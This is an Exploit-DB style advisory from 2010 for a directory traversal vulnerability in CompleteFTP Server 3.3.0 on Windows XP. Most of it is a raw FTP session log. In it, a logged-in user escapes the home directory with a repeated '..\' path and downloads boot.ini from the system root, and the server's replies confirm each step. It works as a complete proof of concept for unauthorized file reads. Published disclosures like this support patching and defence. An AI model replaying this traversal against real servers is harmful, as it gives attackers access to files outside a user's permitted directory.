CompleteFTP Server Directory Traversal

2010-03-30T00:00:00
ID EDB-ID:11973
Type exploitdb
Reporter zombiefx
Modified 2010-03-30T00:00:00

Description

CompleteFTP Server Directory Traversal. Remote exploit for windows platform

                                        
                                            # Exploit Title: CompleteFTP Server Directory Traversal
# Date: 2010-03-30
# Author: zombiefx darkernet@gmail.com<mailto:darkernet@gmail.com>
# Software Link: http://www.enterprisedt.com/products/completeftp/download/CompleteFTPSetup.exe
# Version: CompleteFTP Server v 3.3.0
# Tested on: Windows XP SP3
# CVE :
# Code :
230 User test logged in.
ftp> pwd
257 "/Home/test" is current directory.
ftp> cd ..\..\..\..\..\..\..\..\
250 Directory changed to "/Home/test/..\..\..\..\..\..\..\..\".
ftp> get boot.ini
200 PORT command successful.
150 Opening ASCII mode data connection for boot.ini
226 Transfer complete.
ftp: 215 bytes received in 0.14Seconds 1.54Kbytes/sec.